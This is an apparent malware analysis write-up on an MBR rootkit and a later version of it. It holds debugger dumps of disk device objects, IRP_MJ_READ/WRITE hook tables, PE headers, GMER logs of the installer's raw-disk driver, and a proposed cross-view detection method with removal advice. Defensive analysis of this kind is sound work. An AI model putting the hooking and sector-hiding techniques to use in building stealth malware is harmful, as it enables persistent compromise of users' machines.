PartMgr!PmUnload+0 +0x038 MajorFunction : [28] 0xf9cd44af PartMgr!PmPassThrough+0 +0x00c NextDevice : (null) +0x010 AttachedDevice : (null) +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0x10 +0x020 Characteristics : 0x100 +0x024 Vpb : 0x81bebca0 +0x000 Type : 10 +0x002 Size : 88 +0x004 Flags : 0 +0x006 VolumeLabelLength : 0 +0x008 DeviceObject : (null) +0x00c RealDevice : 0x81be0020 +0x010 SerialNumber : 0 +0x014 ReferenceCount : 0 +0x018 VolumeLabel : [32] 0 +0x028 DeviceExtension : 0x81be00d8 +0x02c DeviceType : 7 +0x030 StackSize : 4 '' +0x034 Queue : __unnamed +0x000 ListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] +0x000 Wcb : _WAIT_CONTEXT_BLOCK +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x000 Type : 20 +0x002 Size : 20 +0x004 DeviceListHead : _LIST_ENTRY [ 0x81be0084 - 0x81be0084 ] +0x00c Lock : 0 +0x010 Busy : 0 '' +0x074 Dpc : _KDPC +0x000 Type : 0 +0x002 Number : 0 '' +0x003 Importance : 0 '' +0x004 DpcListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] +0x00c DeferredRoutine : (null) +0x010 DeferredContext : (null) +0x014 SystemArgument1 : (null) +0x018 SystemArgument2 : (null) +0x01c Lock : (null) +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : (null) +0x09c DeviceLock : _KEVENT +0x000 Header : _DISPATCHER_HEADER +0x0ac SectorSize : 0 +0x0ae Spare1 : 0 +0x0b0 DeviceObjectExtension : 0x81be01e8 +0x000 Type : 13 +0x002 Size : 0 +0x004 DeviceObject : 0x81be0020 +0x008 PowerFlags : 0 +0x00c Dope : 0x81b81d60 +0x010 ExtensionFlags : 0 +0x014 DeviceNode : (null) +0x018 AttachedTo : 0x81be1ab8 +0x01c StartIoCount : 0 +0x020 StartIoKey : 0 +0x024 StartIoFlags : 0 +0x028 Vpb : (null) +0x0b4 Reserved : (null) +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0x50 +0x020 Characteristics : 0x100 +0x024 Vpb : 0x81bebd00 +0x000 Type : 10 +0x002 Size : 88 +0x004 Flags : 0x10 +0x006 VolumeLabelLength : 0 +0x008 DeviceObject : (null) +0x00c RealDevice : 0x81be1ab8 +0x000 Type : 3 +0x002 Size : 0x518 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81b92510 +0x00c NextDevice : (null) +0x010 AttachedDevice : 0x81be0020 +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0x50 +0x020 Characteristics : 0x100 +0x024 Vpb : 0x81bebd00 +0x028 DeviceExtension : 0x81be1b70 +0x02c DeviceType : 7 +0x030 StackSize : 3 '' +0x034 Queue : __unnamed +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x074 Dpc : _KDPC +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : 0xe13c9d90 +0x09c DeviceLock : _KEVENT +0x0ac SectorSize : 0 +0x0ae Spare1 : 1 +0x0b0 DeviceObjectExtension : 0x81be1fd0 +0x0b4 Reserved : (null) +0x010 SerialNumber : 0xffffffff +0x014 ReferenceCount : 0 +0x018 VolumeLabel : [32] 0 +0x028 DeviceExtension : 0x81be1b70 +0x02c DeviceType : 7 +0x030 StackSize : 3 '' +0x034 Queue : __unnamed +0x000 ListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] +0x000 Flink : (null) +0x004 Blink : (null) +0x000 Wcb : _WAIT_CONTEXT_BLOCK +0x000 WaitQueueEntry : _KDEVICE_QUEUE_ENTRY +0x010 DeviceRoutine : (null) +0x014 DeviceContext : (null) +0x018 NumberOfMapRegisters : 0 +0x01c DeviceObject : (null) +0x020 CurrentIrp : (null) +0x024 BufferChainingDpc : (null) +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x000 Type : 20 +0x002 Size : 20 +0x004 DeviceListHead : _LIST_ENTRY [ 0x81be1b1c - 0x81be1b1c ] +0x000 Flink : 0x81be1b1c [ 0x81be1b1c - 0x81be1b1c ] +0x004 Blink : 0x81be1b1c [ 0x81be1b1c - 0x81be1b1c ] +0x00c Lock : 0 +0x010 Busy : 0 '' +0x074 Dpc : _KDPC +0x000 Type : 0 +0x002 Number : 0 '' +0x003 Importance : 0 '' +0x004 DpcListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] +0x000 Flink : (null) +0x004 Blink : (null) +0x00c DeferredRoutine : (null) +0x010 DeferredContext : (null) +0x014 SystemArgument1 : (null) +0x018 SystemArgument2 : (null) +0x01c Lock : (null) +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : 0xe13c9d90 +0x09c DeviceLock : _KEVENT +0x000 Header : _DISPATCHER_HEADER +0x000 Type : 0x1 '' +0x001 Absolute : 0 '' +0x002 Size : 0x4 '' +0x003 Inserted : 0 '' +0x004 SignalState : 1 +0x008 WaitListHead : _LIST_ENTRY [ 0x81be1b5c - 0x81be1b5c ] +0x0ac SectorSize : 0 +0x0ae Spare1 : 1 +0x0b0 DeviceObjectExtension : 0x81be1fd0 +0x000 Type : 13 +0x002 Size : 0 +0x004 DeviceObject : 0x81be1ab8 +0x000 Type : 3 +0x002 Size : 0x518 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81b92510 +0x00c NextDevice : (null) +0x010 AttachedDevice : 0x81be0020 +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0x50 +0x020 Characteristics : 0x100 +0x024 Vpb : 0x81bebd00 +0x028 DeviceExtension : 0x81be1b70 +0x02c DeviceType : 7 +0x030 StackSize : 3 '' +0x034 Queue : __unnamed +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x074 Dpc : _KDPC +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : 0xe13c9d90 +0x09c DeviceLock : _KEVENT +0x0ac SectorSize : 0 +0x0ae Spare1 : 1 +0x0b0 DeviceObjectExtension : 0x81be1fd0 +0x0b4 Reserved : (null) +0x008 PowerFlags : 0 +0x00c Dope : 0x81b81e68 +0x010 ExtensionFlags : 0 +0x014 DeviceNode : (null) +0x018 AttachedTo : 0x81be2f18 +0x000 Type : 3 +0x002 Size : 0xb8 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81bebbd0 +0x00c NextDevice : 0x81b93030 +0x010 AttachedDevice : 0x81be1ab8 +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0x50 +0x020 Characteristics : 0x180 +0x024 Vpb : (null) +0x028 DeviceExtension : 0x81ba0e50 +0x02c DeviceType : 0x32 +0x030 StackSize : 2 '' +0x034 Queue : __unnamed +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x074 Dpc : _KDPC +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : 0xe13c9d90 +0x09c DeviceLock : _KEVENT +0x0ac SectorSize : 0 +0x0ae Spare1 : 1 +0x0b0 DeviceObjectExtension : 0x81be2fd0 +0x0b4 Reserved : (null) +0x01c StartIoCount : 0 +0x020 StartIoKey : 0 +0x024 StartIoFlags : 0 +0x028 Vpb : (null) +0x0b4 Reserved : (null) DriverObject -> MajorFunction 81b92548 f9a92c30 CLASSPNP!ClassCreateClose 81b9254c 805025e4 nt!IopInvalidDeviceRequest 81b92550 f9a92c30 CLASSPNP!ClassCreateClose 81b92554 81831410 <--- IRP_MJ_READ hook 81b92558 81831410 <--- IRP_MJ_WRITE hook 81b9255c 805025e4 nt!IopInvalidDeviceRequest 81b92560 805025e4 nt!IopInvalidDeviceRequest 81b92564 805025e4 nt!IopInvalidDeviceRequest 81b92568 805025e4 nt!IopInvalidDeviceRequest 81b9256c f9a8d366 CLASSPNP!ClassShutdownFlush 81b92570 805025e4 nt!IopInvalidDeviceRequest 81b92574 805025e4 nt!IopInvalidDeviceRequest 81b92578 805025e4 nt!IopInvalidDeviceRequest 81b9257c 805025e4 nt!IopInvalidDeviceRequest 81b92580 f9a8d44d CLASSPNP!ClassDeviceControlDispatch 81b92584 f9a90fc3 CLASSPNP!ClassInternalIoControl 81b92588 f9a8d366 CLASSPNP!ClassShutdownFlush 81b9258c 805025e4 nt!IopInvalidDeviceRequest 81b92590 805025e4 nt!IopInvalidDeviceRequest 81b92594 805025e4 nt!IopInvalidDeviceRequest 81b92598 805025e4 nt!IopInvalidDeviceRequest 81b9259c 805025e4 nt!IopInvalidDeviceRequest 81b925a0 f9a8eef3 CLASSPNP!ClassDispatchPower 81b925a4 f9a93a24 CLASSPNP!ClassSystemControl 81b925a8 805025e4 nt!IopInvalidDeviceRequest 81b925ac 805025e4 nt!IopInvalidDeviceRequest 81b925b0 805025e4 nt!IopInvalidDeviceRequest 81b925b4 f9a92d15 CLASSPNP!ClassDispatchPnp 81b925b8 81b92510 81b925bc f9a94ec0 CLASSPNP!ClassAddDevice
The malicious kernel driver is loaded at the last stage of boot process. The driver as the main part of this rootkit is responsible for the network communication and hiding real content of affected sectors.
Microsoft (R) COFF Binary File Dumper Version 6.00.8447 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. Dump of file mbr.sys PE signature found File Type: EXECUTABLE IMAGE FILE HEADER VALUES 14C machine (i386) 5 number of sections 47578F69 time date stamp Thu Dec 06 06:58:01 2007 0 file pointer to symbol table 0 number of symbols E0 size of optional header 10E characteristics Executable Line numbers stripped Symbols stripped 32 bit word machine OPTIONAL HEADER VALUES 10B magic # 7.10 linker version 9900 size of code 2F078 size of initialized data 0 size of uninitialized data 9946 RVA of entry point 480 base of code 9A80 base of data 10000 image base 80 section alignment 80 file alignment 5.00 operating system version 5.00 image version 5.00 subsystem version 0 Win32 version 3BBF8 size of image 480 size of headers 47EF6 checksum 1 subsystem (Native) 0 DLL characteristics 40000 size of stack reserve 1000 size of stack commit 100000 size of heap reserve 1000 size of heap commit 0 loader flags 10 number of directories 0 [ 0] RVA [size] of Export Directory 9C9C [ 28] RVA [size] of Import Directory 0 [ 0] RVA [size] of Resource Directory 0 [ 0] RVA [size] of Exception Directory 0 [ 0] RVA [size] of Certificates Directory 9E80 [ 2DFC] RVA [size] of Base Relocation Directory 0 [ 0] RVA [size] of Debug Directory 0 [ 0] RVA [size] of Architecture Directory 0 [ 0] RVA [size] of Special Directory 0 [ 0] RVA [size] of Thread Storage Directory 0 [ 0] RVA [size] of Load Configuration Directory 0 [ 0] RVA [size] of Bound Import Directory 9A80 [ 44] RVA [size] of Import Address Table Directory 0 [ 0] RVA [size] of Delay Import Directory 0 [ 0] RVA [size] of Reserved Directory 0 [ 0] RVA [size] of Reserved Directory SECTION HEADER #1 .text name 95BC virtual size 480 virtual address 9600 size of raw data 480 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E8000020 flags Code Not Paged Execute Read Write SECTION HEADER #2 .rdata name A8 virtual size 9A80 virtual address 100 size of raw data 9A80 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E8000040 flags Initialized Data Not Paged Execute Read Write SECTION HEADER #3 INIT name 2F6 virtual size 9B80 virtual address 300 size of raw data 9B80 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E8000020 flags Code Not Paged Execute Read Write SECTION HEADER #4 .reloc name 2E26 virtual size 9E80 virtual address 2E80 size of raw data 9E80 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E8000040 flags Initialized Data Not Paged Execute Read Write SECTION HEADER #5 .attach name 2EEF8 virtual size CD00 virtual address 2EEF8 size of raw data CD00 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E8000040 flags Initialized Data Not Paged Execute Read Write Summary 2EF00 .attach 100 .rdata 2E80 .reloc 9600 .text 300 INIT
The detection method could be based on cross-view comparison of MBR sector. The userland part can use Windows API functions to read a fake content of MBR:
hFile = CreateFile( "\\\\.\\PHYSICALDRIVE0", GENERIC_READ, ... ReadFile( hFile, Buffer, 512, ...
and the kernel part of the scanner could read MBR by using original pointer of \Driver\Disk -> MajorFunction[IRP_MJ_READ] = CLASSPNP!ClassReadWrite.
If the content of sectors is not identical, the machine has been infected.
To remove rootkit from infected machine you can simply use "Recovery Console" command: fixmbr.
[1] Derek Soeder Ryan Permeh, eEye BootRoot, 2005 http://research.eeye.com/html/tools/RT20060801-7.html
[2] Symantec AntiVirus Research Center, Understanding Virus Behavior under Windows NT http://www.symantec.com/avcenter/reference/virus.behavior.under.win.nt.pdf
[3] Joanna Rutkowska, Pagefile attack, 2006 http://theinvisiblethings.blogspot.com/2006_10_01_archive.html
[4] Mark Russinovich Bryce Cogswell, Process Monitor http://www.microsoft.com/technet/sysinternals/processesandthreads/processmonitor.mspx
[5] Nitin Kumar Vipin Kumar, Vbootkit: Compromising Windows Vista Security, 2007 http://www.blackhat.com/presentations/bh-europe-07/Kumar/Presentation/bh-eu-07-kumar-apr19.pdf
After a month, the author of the rootkit, released improved version of the malware. The main part of rootkit is almost identical to the previous one, and the changes concerning the installer.
Dump of file mbr2.sys PE signature found File Type: EXECUTABLE IMAGE FILE HEADER VALUES 14C machine (i386) 5 number of sections 47AA1720 time date stamp Wed Feb 06 21:22:56 2008 0 file pointer to symbol table 0 number of symbols E0 size of optional header 10E characteristics Executable Line numbers stripped Symbols stripped 32 bit word machine OPTIONAL HEADER VALUES 10B magic # 7.10 linker version 6C00 size of code 2FB60 size of initialized data 0 size of uninitialized data 6C18 RVA of entry point 480 base of code 6D80 base of data 10000 image base 80 section alignment 80 file alignment 5.00 operating system version 5.00 image version 5.00 subsystem version 0 Win32 version 38AE0 size of image 480 size of headers 408B1 checksum 1 subsystem (Native) 0 DLL characteristics 40000 size of stack reserve 1000 size of stack commit 100000 size of heap reserve 1000 size of heap commit 0 loader flags 10 number of directories
The previous version of the installer was modifying disk sectror via the standard Windows API functions. This method of infection of the MBR could be easly intercept by security applications, so the latest version uses special driver developed for the direct disk sectors access.
2008-02-10 14:09:21 gmer.sys cmd.exe [372]: CreateProcessEx c:\rootkits\mat25.exe 2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\docume~1\przemek\ustawi~1\temp\1.tmp 2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\rootkits\mat25.exe 2008-02-10 14:10:07 gmer.sys services.exe [552]: CreateProcessEx c:\windows\system32\svchost.exe 2008-02-10 14:10:16 gmer.sys svchost.exe [1252]: CreateProcessEx c:\windows\temp\3.tmp 2008-02-10 14:11:21 gmer.sys services.exe [552]: LoadDriver \??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{FBE1D620-5418-4aae-A0F0-316D590663A1}] "Type"=dword:00000001 "Start"=dword:00000003 "ErrorControl"=dword:00000000 "ImagePath"="\??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}"
{FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BFB System: nt!KeInitializeSpinLock {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C8C System: nt!ObReferenceObjectByHandle( (HANDLE)0x17C [\Device\Harddisk0] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C99 System: nt!ZwClose( (HANDLE)0x17C [\Device\Harddisk0] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D26 System: nt!ObfDereferenceObject( (OBJECT)0x81A53248 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D38 System: nt!ExAllocatePoolWithTag( (SIZE_T)24 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D5F System: nt!ExfInterlockedInsertTailList {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk1" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk1" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk2" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk2" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk3" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk3" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk4" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk4" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk5" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk5" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk6" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk6" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk7" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk7" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk8" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk8" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk9" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk9" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk10" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk10" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk11" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk11" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk12" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk12" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk13" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk13" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk14" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk14" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk15" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk15" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2DE6 System: nt!RtlInitUnicodeString( "\Device\RealHardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E05 System: nt!IoCreateDevice( "\Device\RealHardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E4D System: nt!RtlInitUnicodeString( "\DosDevices\RealHardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E5D System: nt!IoCreateSymbolicLink( "\DosDevices\RealHardDisk0", "\Device\RealHardDisk0" ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 1.tmp: nt!IoBuildDeviceIoControlRequest {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A63E70 [IRP_MJ_DEVICE_CONTROL ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000000000000000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB90000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) ... ... ... {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9DE00 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E000 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E200 ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] ) {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: 